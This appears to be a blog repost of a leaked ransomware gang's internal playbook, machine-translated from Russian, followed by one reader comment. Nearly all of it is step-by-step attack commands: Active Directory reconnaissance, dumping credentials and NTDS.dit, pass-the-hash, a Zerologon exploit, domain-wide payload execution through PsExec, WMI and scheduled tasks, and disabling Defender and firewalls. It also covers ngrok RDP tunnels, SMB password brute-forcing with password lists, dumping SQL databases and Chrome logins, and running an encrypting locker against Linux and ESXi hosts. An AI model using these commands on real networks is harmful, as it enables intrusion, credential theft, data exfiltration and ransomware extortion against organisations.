Also inspect \\ 172.16.1.40 \ C $ \ ProgramData
+ Program files / x86
+ Local drives that fell out in net view \\ host / ALL
D $ etc

Also in ad_users.txt there is homeDir – we also look at it, study it.


Look like that’s it.

For what the manual was written – so as not to try to go at breakneck speed to raise the session and catch alerts from the administrator.
Our job is rather to figure out what is how it works, and not to configure brute force for all kinds of access.
Everything is already hacked, you just need to look at everything! Through the eyes of an admin!
The main task of the admin hunt is to understand where he stores passwords and to steal the database \ ekselka \ file \ textvik \ document

File Name: If you need to scan the entire mesh in one sheet.txt

(*** special thanks to @Versace)
if you need to scan the entire grid with one sheet, then use the command for adfind:
adfind.exe -f objectcategory = computer -csv name cn OperatingSystem dNSHostName> some.csv

File Name: INITIAL ACTIONS.txt

INITIAL ACTIONS

1) Removing AD – allows us to find out how many servers and workstations are in the network, as well as information about users, who has what position, etc.
2) Removing the ball (sharfinder) – with the help of it, we look where we have access with this user (on other PCs)
3) Kerberos attack – pulls hashes from under memory, with successful removal and successful hashing – DomainAdmin is provided to us
4) If we have system rights, using the command “hashdump” and “logonpasswords” we can pull off the hashes and mimics and we will have already flogged the domain user, and it happens that the domain of the admin
5) If we found the login and hash domain of the admin and at the same time we could not hash hash, we make the following command pth Domain \ Admin pass (in the form of a hash), using the command shell dir \\ ip or hostname \ c $ we will check access to the server or workstation
6) If we find the login \ pass domain of the admin or polzak, we can equip his token, the command looks like this make_token Domain \ Admin Pass, if you want to withdraw the token, the command rev2self7) Если на сессии есть процесс system , при помощи команды getsystem можно поднять систменые права на сесии, пункт (4)
8) Also, do not forget to watch the processes using the ps command, there you can find the user, migrate to his process> Explore> Process list> then select the user process (the user must be different, not the one on the session) and click inject, select SSL listener
9) After migrating to a new user, you also need to remove the balls to see where you can break with him , download, see how many “remote admin” are in the text editor, if there are more than one, it means that there is access to another computer
11) Click on the session> File Browser> write the path \\ ip or hostname of the computer to which you have access \ c $, put the peloyd there, I’ll give it out the same
12) The launch of the peloid depends on its format exe or dll, after launching, I will personally explain later
13) Ping servers and workstations like this, we need p.bat, I’ll throw it into the group. We create a txt, call it domains.txt, add the hostnames of servers or workers there. Hostnames are taken from the removed blood pressure, using scripts, we will show them how to use
14) If you find some kind of password, you can also run it through smb_login – this is a tool in metasploit, I will issue a metasploit and tell you how to use it. smb_login will show on which servers or workers, there is access with these credits

File Name: Installing metasploit on VPS.txt

Installing metasploit on VPS

1 apt-get update
apt-get install curl
apt-get install tmux
apt-get install default-jdk
apt-get install postgresql
apt-get install nano
apt-get install gpg
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod +x msfinstall
./msfinstall
2
далее открываем

nano /opt/metasploit-framework/bin/msfdb

Installing metasploit on VPS
# if grep -q kali /etc/os-release; then
# echo “Metasploit running on Kali Linux as root, using system database

сохраняем CTRL+O
msfdb init

File Name: List of TG forums, many interesting things.txt

File Name: locker launch parameter on Linux versions.txt

@all parameter for launching the locker on linux versions
Unix version launch parameters
–path
When using this parameter, the locker will encrypt files in the specified path. A required parameter will not lock anything without it.
./encryptor –path / path

–prockiller
Kills all processes that interfere with the opening of files.
./encryptor –path / path –prockiller
–log
Includes logging of all actions and errors
./encryptor –path / path –log /root/log.txt

–vmkiller (esxi only)
Shuts down all virtual machines

–vmlist (esxi only)
Specifies a file with a list of virtual machines that should not be shut down. One line for each vm
./encryptor –path / path –vmkiller –vmlist /tmp/list.txt
–detach
Detaches the process from the terminal.
So that if the ssh session falls off, the locker will continue to work
And the files are not beaten

ESXi version REQUEST SEPARATELY


If somewhere it does not start, I need an OS, a kernel version and a glibc version
/lib64/libc.so.6

File Name: Manual operation with AD DC.txt


C:\Windows\System32\config\sam
C:\Windows\System32\config\security
C:\Windows\System32\config\system
——————> these files store information such as hashed passwords of all Windows user accounts,
security-related parameters, encryption key data, and other important information about the OS kernel configuration.

sleep 5
ps
cd C:\ProgramData
AV_Query
powershell-import /opt/PowerSploit-dev/Recon/PowerView.ps1
powershell Get-DomainController
powershell Get-DomainComputer -Properties dnshostname
powershell Get-DomainComputer -OperatingSystem *server* -Properties dnshostname
shell net group “domain Admins” /domain
shell net group “Enterprise Admins” /domain
logonpasswords
shell nltest /DOMAIN_TRUSTS
make_token FMH\maysys 34stb4y@345
dcsync FMH
upload /home/tester/Desktop/payload/x64.dll (\\FMH-DC01.FMH.local\C$\ProgramData\x64.dll)
remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\x64.dll StartW
rm \\FMH-DC01.FMH.local\C$\ProgramData\x64.dll
upload /home/tester/Desktop/FMH/x64.dll (\\FMH-DC01.FMH.local\C$\ProgramData\x64.dll)
upload /home/tester/Desktop/FMH/tlt.dll (\\FMH-DC01.FMH.local\C$\ProgramData\tlt.dll)
remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\tlt.dll StartW
rm \\FMH-DC01.FMH.local\C$\ProgramData\tlt.dll
rm \\FMH-DC01.FMH.local\C$\ProgramData\x64.dll
rev2self
make_token FMH.local\Administrator 34stb4y*.*
powershell-import /opt/PowerSploit-dev/Recon/ShareFinder.ps1
powerpick Invoke-ShareFinder -Ping -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\share.txt
download C:\ProgramData\share.txt
rm C:\ProgramData\share.txt
dcsync FMH.local
upload /home/tester/Desktop/FMH/tlt.dll (\\OPERA-APP.FMH.local\C$\ProgramData\tlt.dll)
remote-exec wmi OPERA-APP.FMH.local rundll32.exe C:\ProgramData\tlt.dll StartW
rm \\OPERA-APP.FMH.local\C$\ProgramData\tlt.dll
sleep 0
net domain_controllers
net domain_trusts
shell whoami /all
shell hostname
powershell get-adcomputer -filter * | select -expand name
upload /home/host/Desktop/1.bat (C:\ProgramData\1.bat)
shell cd c:\programata
ls
powershell get-adcomputer -filter * -properties passwordlastset | select name, ipv4address, passwordlastset | sort passwordlastset


shell 1.bat
echo FMH-DC01 1>>c:\programdata\qu.txt
quser /server:FMH-DC01 1>>c:\programdata\qu.txt

powershell Get-ADComputer -Filter ‘operatingsystem -notlike “*server*” -and enabled -eq “true”‘ ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\workstations.txt
powershell Get-ADComputer -Filter ‘operatingsystem -notlike “*server*” -and enabled -eq “true”‘ ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize
ls
upload /home/host/Desktop/2.bat (C:\ProgramData\2.bat)
echo OPERA-APP 1>>c:\programdata\qu.txt
quser /server:OPERA-APP 1>>c:\programdata\qu.txt
powershell Get-ADComputer -Filter ‘operatingsystem -like “*server*” -and enabled -eq “true”‘ ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize
ls


beacon> upload /home/host/Desktop/3.bat (C:\ProgramData\3.bat)
shell 3.bat
echo FMH-DC01 1>>c:\programdata\sh.txt
net view \\FMH-DC01 /all 1>>c:\programdata\sh.txt
powershell get-adcomputer -filter * -properties passwordlastset | select name, ipv4address, passwordlastset | sort passwordlastset
download C:\ProgramData\ts.txt
download c:\programdata\sh.txt
shell dir \\192.168.1.82\c$
shell whoami
rev2self
make_token MH.local\backups Riverd0gs1
shell dir \\192.168.1.82\c$
********************************************ДРУГАЯ ТАЧКА******************
sleep 5
ps
logonpasswords
shell systeminfo /s FMH-EXCH01
rev2self
make_token FMH.local\Administrator 34stb4y*.*
sleep 0
shell dir \\192.168.1.82\c$
shell quser /server:192.168.1.89
shell net user scott.geer /dom
shell tasklist /s 192.168.1.89
download \\192.168.1.89\c$\users\scott.geer\AppData\Local\Google\Chrome\User Data\Default\History
download \\192.168.1.89\c$\users\scott.geer\AppData\Local\Google\Chrome\User Data\Default\Login Data
shell ping FMH-BACKUPS02
shell quser /server:FMH-BACKUPS02
shell quser /server:192.168.1.132
shell ping 192.168.1.132
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

get-adcomputer -filter * | select -expand name | out-file c:\programdata\hosts.txt

 

Get-ADComputer -Filter ‘operatingsystem -notlike “windows” -and enabled -eq “true”‘ ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\other.txt


Get-ADComputer -Filter ‘operatingsystem -like “server” -and enabled -eq “true”‘ ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\servers.txt


Get-ADComputer -Filter ‘operatingsystem -notlike “server” -and enabled -eq “true”‘ ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\workstations.txt

этими скриптами снимаем и парсим хосты, которые есть в сетке
щас запущу пару бат файлов, чтобы посмотреть, какие процессы крутяться, где какие пользки сидят, все доступные шары на хостах

*****************************************************************************************************************************************************************
берем данные из host.txt
чтобы сделать бат файл
делается так
echo FMH-DC01 >> c:\programdata\qu.txt
quser /server:FMH-DC01 >> c:\programdata\qu.txt
и так с каждым хостом, который есть из вывода
вс это пакуем в файл с расширение .bat и запускаем на хосте через cmd, либо шелл в КС shell 1.bat
лучше всего запускать от ДА -домен админ, чтобы был доступ по rpc к каждому доступному хосту в AD
—————————————————————————————————————————————————————–
This tool can make a shadow copy of ntds.dit and system files
1)vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\programdata
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\programdata
для дампа нтс файла
Sven ты спраишивал как тихо снимать
но все равно некоторые сильные аверы могут это детектить, типо софоса, сентинела или от palo alto
либо такой способ
PS C:\> ntdsutil
C:\Windows\system32\ntdsutil.exe: activate instance ntds
Active instance set to “ntds”.
C:\Windows\system32\ntdsutil.exe: ifm
ifm: help

? – Show this help information
Create Full %s – Create IFM media for a full AD DC or an AD/LDS instance into folder %s
Create Full NoDefrag %s – Create IFM media without defragmenting for a full AD DC or an AD/LDS instance into folder %s
Create RODC %s – Create IFM media for a Read-only DC into folder %s
Create Sysvol Full %s – Create IFM media with SYSVOL for a full AD DC into folder %s
Create Sysvol Full NoDefrag %s – Create IFM media with SYSVOL and without defragmenting for a full AD DC into folder %s Create Sysvol RODC %s – Create IFM media with SYSVOL for a Read-only DC into folder %s
Help – Show this help information
Quit – Return to the prior menu

ifm: create full C:\pwdadmin
//////////////////////////////////////////////////////////////////////////////////////////

File Name: MANUAL.txt

GOING TO THE AGENT:
RIGHT BUTTON ON THE AGENT AND CLICK INTERACT

1) SEE LIST OF ADMINISTRATORS shell net group “domain admins” / domain

2) DOMAIN NAME shell net view / all / domain

3) SEE LIST DC shell nltest / dclist: “NameDomain”

4) FIND OUT LIST OF SERVERS
LOADING THE POWERView MODULE
RIGHT BUTTON ON AGENT Get Info> Get Servers
GOT A LIST OF SERVERS

5) FIND OUT THE LIST OF COMPUTERS
BECAUSE THE PowerView MODULE IS ALREADY LOADED
RIGHT BUTTON BY AGENT Get Info> Get All Computers
GOT A LIST OF COMPUTERS
6) IT IS NECESSARY TO LEARN THE PASSWORDS OF ALL DOMAIN ADMINS
RIGHT BUTTON ON THE AGENT
HIT ACCESS> DUMP HASHES
GO ABOVE VIEW TAB> CREDENTIALS
WE TAKE ALL HASHES AND LOOKING FOR DOMAIN ADMINS

7) NEED TO FIND NAS, BACKUP
WITH THIS COMMAND WE WILL RECOGNIZE ALL SUBNETS OF THE DOMAIN powershell Get-NetSubnet
THE NEXT TEAM SHOULD FIND OUT WHAT IP ADDRESS IS THE NAS, BACKUP
portscan 107.191.177.1-107.191.177.255 5000 icmp 1024

LIST OF USEFUL COMMANDS WHICH I CAN USE:
REMOVE AGENT RIGHTS BEFORE DEFAULT rev2self
ENABLE THE USER VIA CMD shell net user Administrator / active: yes
USER INFORMATION shell net user careadmin / domain
ENABLE RDP CONNECTION shell reg add “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fDenyTSConnections / t REG_DWORD / d 0 / f
DISABLE DEFENDER powershell Set-MpPreference -DisableRealtimeMonitoring $ true
UPDATE POLICIES shell repadmin / syncall / AdeP
SHOW DOMAIN TRUSTS shell nltest / domain_trusts / all_trusts
RUNNING THE APPLICATION ON ANOTHER PC shell wmic / node: “PC NAME” process call create “COMMAND TO BE EXECUTED”

File Name: NetScan.txt

A great tool is NetScan, which makes it easy to scout and find NAS \ Backup, etc.
Scans networks by range using the credentials of the user / administrator on whose behalf the software was launched.
Returns the following information:
Hostname, Open Ports, Group / Domain Membership, Total Disk Space, Available Shares, Device Manufacturer, PC / Server Role

1) Load the NetScan folder on any infected PC. Let’s say C: \ Programdata \ netscan

2) cd C: \ programdata \ netscan

3) make_token DOMAIN \ admin password

4) shell netscan.exe / hide /auto:”result.xml “/config:netscan.xml /range:192.168.0.1-192.168.1.255
We change the ranges to our own, do not touch the rest

5) We are waiting. After completion, the result.xml file will appear in our folder, download it to your computer

6) We open NetScan on our Windows, load the downloaded file there and see the result in a convenient format.
We sort by disk size, so you will immediately understand where the juice itself is hidden

Special thanks to Perry for helping me find the technical documentation on which this manual is based.
Sonic, you can add NetScan to the algorithm

File Name: Operating CVE-2020-1472 Zerologon in Cobalt Strike.txt

Operating CVE-2020-1472 Zerologon at Cobalt Strike

Download the script here
https://github.com/rsmudge/ZeroLogon-BOF

We connect, as usual, the address of the script
ZeroLogon-BOF / dist / zerologon.cna

A new command should appear in the console – zerologon

Application:

net domain – get the domain name (for example domain.local)

We launch the exploit:
zerologon iunderstand domain.local

iunderstand is a stop word. By exploiting this vulnerability, we reset the password. This exploit can cause the domain controller to malfunction. LASTLY USE.

If successful, we get:
Success! Use pth. \\% S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync

We do everything as written. we carry out
pth. \\% S 31d6cfe0d16ae931b73c59d7e0c089c0

And we carry out
dcsync domain.local

If everything worked out successfully, we get NTDS

File Name: Personal safety.txt

I think everyone here works through a virtual machine. Therefore, I advise you to install a virtual machine on a encrypted volume using VeraCrypt.
1 download Veracrypt
2 you will need to allocate space on your disk for a file / or encrypt the entire disk at once
An important rule is that you will have to install the virtual machine again, because, unfortunately, when you encrypt your old working virtual machine,
an insurmountable error will appear in the code and it will no longer start. This is not a big problem, because you can get all your files from the image
of your old virtual machine via 7ZIP.

Do not forget to save your passes for entering this chat or Tokyo jaber, because if you lose it, then no one will help you to return.

(if anyone can find a way without installing a new OS, please write it down, please fix it)

File Name: PROSTITION.txt

COLLECTING A DOMAIN FOR COPYING A FILE
start PsExec.exe / accepteula @C: \ share $ \ comps1.txt -u DOMAIN \ ADMINISTRATOR -p PASSWORD cmd / c COPY “\\ PRIMARY DOMAIN CONTROLLER \ share $ \ fx166.exe” “C: \ windows \ temp \ “
WE SAVE AS “COPY.BAT”

COLLECTING A DOMAIN TO RUN A FILE
start PsExec.exe -d @C: \ share $ \ comps1.txt -u DOMAIN \ ADMINISTRATOR -p PASSWORD cmd / c c: \ windows \ temp \ fx166.exe
WE SAVE AS “EXE.BAT”

COLLECTING WMI DATABASE FOR COPYING AND RUNNING A FILE ALL OVER THE DOMAIN
start wmic /node:@C:\share$\comps1.txt / user: “DOMAIN \ Administrator” / password: “PASSWORD” process call create “cmd.exe / c bitsadmin / transfer fx166 \\ DOMAIN CONTROLLER \ share $ \ fx166.exe% APPDATA% \ fx166.exe &% APPDATA% \ fx166.exe “
WE SAVE AS “WMI.BAT”

File Name: raising rights (default).txt

raising rights (default)
if we see that the bot came with a blue monik, the first thing we check is the rights of our user on the wheelbarrow (shell whoami / groups)
if we see at the very top that we have admin rights (BULTIN \ Administrators), then boldly press pkm on the bot – access – eleavey
Further:
svc-exe (start a new session on the bot not from a process but from services, the session will come from a system with a red moniker)
uac-token-dubl (start a session from the current user, but with a red monik)

File Name: RDP NGROK.txt

Register at https://ngrok.com/
– Download ngrok.exe and load it on the wheelbarrow

In the ngrok account panel menu, select “Your Authtoken”
Copy the command with the token (without ./). For example:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg

– We go into the car on the wheelbarrow and write:
shell ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg

– We throw a tunnel to the RDP port:
shell ngrok tcp 3389

– We open the RDP on a wheelbarrow:
shell reg add “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fDenyTSConnections / t REG_DWORD / d 0 / f && reg add “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fAllowToGetHelp 1 / f
shell NetSh Advfirewall set allprofiles state off

shell netsh advfirewall firewall set rule group=”remote desktop” new enable=Yes

shell netsh firewall set service type = remotedesktop mode = enable

We can add a separate user under ngrok:
shell net user Admin Password1 / add
shell net localgroup Administrators Admin / add

– Go to the ngrok account panel – check the tunnel (“Endpoints – Status”).
Copy IP: port from there and go to any RDP client. We connect (you can also use the account that we created).

File Name: RouterScan.txt

Software for Windows, allows you to brute-force routers, cameras, some NAS (depending on the type of authorization), if they have a web interface.
First, it tries to understand what kind of device it is, then apply suitable exploits to it (it breaks the microtic even if the firmware is below 6.12 per second and issues a password in its pure form)
If there are no exploits for this model, then it starts to brute. If necessary, load the dictionaries into 3 text files starting with auth _ ***. Txt, lying in the root of the program. In this form:
Login: Password
Login: Password
Only not through space indents, but through Tab
We pick up the sox on the cob, proxy it through ProxyFier, run it on our Windows, set the ranges or specific ip, the number of threads (5 is the most) and timeout (it is better to increase this value to 3000ms so as not to miss it). The default ports have already been specified, you can add your own if the web does not hang on the standard ones. In the Scanning Module, leave a check mark on the first (Router scan main) and HNAP 1.0, the rest are unlikely to be useful to you. We press start, wait and hope for the result

File Name: SMB AUTOBRUT.txt

“, SMB AUTOBRUT
The input data for carrying out this attack are only passwords.
– those that dumped from the CharpChrome browser
– those dumped by SeatBeltom
– those that dumped in the process of work inside the network (mimikatts, etc.)
And in general any others, for example, found recorded in files

If there are fewer such passwords than we can launch in a brute-force attack, we can safely supplement them from the following list of the most commonly encountered in the corporate environment.
Password1
Hello123
password
Welcome1
banco@1
training
Password123
job12345
spring
food1234


We also recommend using password lists based on the seasons and the current year. Considering that passwords are changed every three months, you can take a “reserve” to generate such a sheet.
For example, in August 2020, we create a list with the following content
June2020
July2020
August20
August2020
Summer20
Summer2020
June2020!
July2020!
August20!
August2020!
Summer20!
Summer2020!

All passwords above fall either into 3 out of 4 requirements for Active Directory passwords (which is enough for users to set them), or into all 4 requirements.
Approx. we consider the most popular version of the requirements.



Domain Admins Scenario
1. We collect the list of domain administrators with the command shell net group “domain admins” / dom
We write the received data to a file
admins.txt

2. We upload this file to the host in the C: \ ProgramData folder

3. Request information on the domain account blocking policy (protection against brute force)

beacon> shell net accounts / dom

Tasked beacon to run: net accounts /dom
host called home, sent: 48 bytes
received output:


The request will be processed at a domain controller for domain shookconstruction.com.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 6
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: BACKUP

We are interested in the Lockout threshold parameter, which most often contains a certain numerical value that we must use later as a parameter (in this case, it is Never, which means that protection against brute-force passwords is disabled.
In this guide, in the future, we will indicate the value 5 as roughly the most common.
The Minimum password length parameter indicates the minimum allowed number of password characters required to filter our “list” of passwords that we will set.

powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1
psinject 4728 x86 Invoke-SMBAutoBrute -UserList “C:\ProgramData\admins.txt” -PasswordList “Password1, Welcome1, 1qazXDR%+” -LockoutThreshold 5 -ShowVerbose
-4728 in this case is the current pid, and x86 is its bit depth
– The list of passwords consists of one which we had “found” and two from the list of popular passwords

6. We look at the progress of the script and see the result

Success! Username: Administrator. Password: 1qazXDR% +
Success! Username: CiscoDirSvcs. Password: 1qazXDR% +



We got two domain administrators out of the way.

================================================== =======================

The scenario without specifying a list of users differs in only two things.
– psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList “Password1, Welcome1, 1qazXDR% +” -LockoutThreshold 5
We do not specify the UserList and ShowVerbose parameters. The absence of the first means that the search will be performed on ALL domain users, the absence of the second means that only SUCCESSFUL results will be displayed.
I will not wait in the video guide for the end of the script that will go through all user / password pairs in the domain, I will only show the output.

Success! Username: Administrator. Password: 1qazXDR% +
Success! Username: CiscoDirSvcs. Password: 1qazXDR% +
Success! Username: support. Password: 1qazXDR% +
Success! Username: accountingdept. Password: 1qazXDR% +



As you can see, we were able to find accounts of other users that may be useful for further promotion on the network and raising rights.

If there is no positive result, you can repeat it after a while (it is optimal to multiply the Lockout duration parameter by two before the next attempt) with a new list of passwords.
The end of the script will be marked by outputting a message to the beacon

File Name: SQL DAMP.txt

0. see who works with the database (hosts and users from where they connected to)
shell sqlcmd -S localhost -Q “select loginame, hostname from sys.sysprocesses”

1. Output to kmd of all databases on the server
shell sqlcmd.exe -S localhost -E -Q “SELECT name FROM master.dbo.sysdatabases;”

with size in megabytes
shell sqlcmd -S localhost -E -Q “SELECT d.name, ROUND (SUM (mf.size) * 8/1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id> 4 GROUP BY d.name ORDER BY d.name; “

2. Unloading the 100 most saturated by the number of rows of tables in the database, the number of rows and the size of tables on the hard drive
sqlcmd -S localhost -E -Q “USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS Total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GRчфOUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;”
2.1.
sqlcmd -S localhost -E -Q “USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS Total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;”

3. Counting rows in a specific table of a specific database
sqlcmd -S localhost -E -Q “select count (*) from% databasename% .dbo.% tablename%;”

4. Dumping the first 10 records in a specific table of a specific database
sqlcmd -S localhost -E -Q “select top 10 * from% databasename% .dbo.% tablename%;”
sqlcmd -S localhost -E -Q “use% databasename%; select top 10 * from% tablename%” -W

5. Search by column names in a specific database using the example of% pass%
sqlcmd -S localhost -E -Q “select COLUMN_NAME as ‘ColumnName’, TABLE_NAME as ‘TableName’ from% databasename% .INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like ‘% pass%’;”
6. Unloading the data of the contents of specific columns from a specific table into a txt file on a hard drive into a folder (in this example, by the numerical value of the table> date
sqlcmd.exe -S localhost -E -Q “select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from% databasename% .dbo.% tablename% where CreatedDate> ‘2017-11-30’;” -W -s “|” -o “C: \ temp \ 123.txt”
FULL>
sqlcmd.exe -S localhost -E -Q “select * from% databasename% .dbo.% tablename%” -W -s “|” -o “C: \ Windows \ Temp \ 1.txt”

7. Displaying all tables of a specific database
shell sqlcmd -S localhost -E -Q “use% databasename%; exec sp_tables” -W

for a remote / other local server, change localhost to ip, port
as an option – localhost,% port% (see netstat)

If a table or base is named from 2-3-4 words, then it is escaped like this [% databasename / tablename%]

sqlcmd -E -S localhost -Q “BACKUP DATABASE databasename TO DISK = ‘d: \ adw.bak'”

File Name: to disable the defender.txt

* to disable the defender – open the gmer or alternatives –
chop off the mspeng process \ with it you go to the file location,
delete the file itself = bravo, you are great

File Name: We replace the sorted finder.txt

You can run a peloyd or some kind of body shirt using SHTASKA
shell SCHTASKS / s ip \ hostname / RU “SYSTEM” / create / tn “WindowsSensor15” / tr “cmd.exe / c C: \ ProgramData \ P32.exe” / sc ONCE / sd 01/01/1970 / st 00: 00
shell SCHTASKS / s ip \ hostname / run / TN “WindowsSensor15”
shell schtasks / S ip \ hostname / TN “WindowsSensor15” / DELETE / F

launching dll peloid looks like this
shell wmic /node:172.16.0.36 process call create “rundll32.exe C: \ ProgramData \ p64.dll StartW”

shell wmic /node:10.28.0.3 process call create “C: \ ProgramData \ j1.exe”
Executing the peloid EXE

File Name: Website creation batnikod.txt

http://tobbot.com/data/
Great for creating teams, with the subsequent creation of batch files

File Name: Working script for creating a VPS server for penetration testing from A to Z.txt

https://xss.is/threads/53632/ – maybe it will be useful
working script for creating a VPS server for penetration testing from A to Z

File Name: Workstation to work through the Tor network.txt

Further (for those who have not done it yet), I propose to transfer the entire workstation to work through the Tor network.

In order to do this, you will need to configure your OS and Whonix (this is the OS that creates a “secure tunnel in Tor” for you (you can read more about it) (in 90% it will be kali), so here is the instruction.

HowTo: Kali + WHONIX или “Анонимный пентест через ТОР”

After this action, I had a problem – Tor over Tor, although I followed the instructions. So here is the solution that helped me: https://www.whonix.org/wiki/Other_Operating_Systems#Configure_Tor_Browser_Settings

There, expand to the same place where the Expand tab will drop you.

File Name: this is an armitage installation. put on top of Metasploit

cd /opt/
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c “echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage”
sudo perl -pi -e ‘s/armitage.jar/\/opt\/armitage\/armitage.jar/g’ /opt/armitage/teamserver

Comentarios

  1. Impresionante articulo. Fue una buena desicion bloquear anydesk en nyestri entorno. Pero debe prestarse suma atebcion al ad.

    ResponderEliminar

Publicar un comentario